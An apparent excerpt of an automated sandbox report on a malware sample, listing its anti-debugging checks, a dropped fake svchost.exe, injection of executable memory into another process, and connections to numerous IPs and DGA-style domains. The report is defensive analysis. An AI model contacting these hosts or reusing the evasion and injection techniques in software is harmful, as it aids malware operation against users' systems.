      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00401DE0 rdtsc 0_2_00401DE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028A7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_028A7430
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00401000 IsDebuggerPresent,FindWindowA,memset,CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,StrStrIA,Process32Next,GetHandleInformation,FindCloseChangeNotification,PathFileExistsA,0_2_00401000
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D37300 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification,1_2_02D37300
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020C0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]1_2_00406800
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]1_2_00406B60
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024C1360 mov edx, dword ptr fs:[00000030h]1_2_024C1360
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_024C1000 mov eax, dword ptr fs:[00000030h]1_2_024C1000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E41360 mov edx, dword ptr fs:[00000030h]5_2_00E41360
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_00E41000 mov eax, dword ptr fs:[00000030h]5_2_00E41000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D51360 mov edx, dword ptr fs:[00000030h]6_2_00D51360
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_00D51000 mov eax, dword ptr fs:[00000030h]6_2_00D51000
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01281360 mov edx, dword ptr fs:[00000030h]8_2_01281360
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01281000 mov eax, dword ptr fs:[00000030h]8_2_01281000
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_004028B0 IsUserAnAdmin,VirtualQuery,GetModuleFileNameA,PathFileExistsA,GetSystemWindowsDirectoryA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,_snprintf,CopyFileA,RtlImageNtHeader,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,MoveFileExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GlobalFindAtomA,ExitProcess,GlobalAddAtomA,0_2_004028B0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E114C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00E114C3
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E15CDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00E15CDB
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E1194F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00E1194F
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_00E11AE2 SetUnhandledExceptionFilter,8_2_00E11AE2

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: lysynur.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 172.234.222.143 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.60 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 5.79.71.225 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: gaqypiz.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.137.66 8001Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: pufyjag.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: galyqoh.com
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.122 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.58 80Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeDomain query: gacyzuh.com
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1280000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D80000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C20000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B90000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1020000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3010000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 850000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2960000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2650000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B00000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2880000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1320000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2490000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2920000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1330000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 950000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C10000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2820000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2730000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1050000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2910000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3030000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2860000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D90000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 800000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C00000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B70000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2250000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and writeJump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E0000 protect: page execute and read and writeJump to behavior
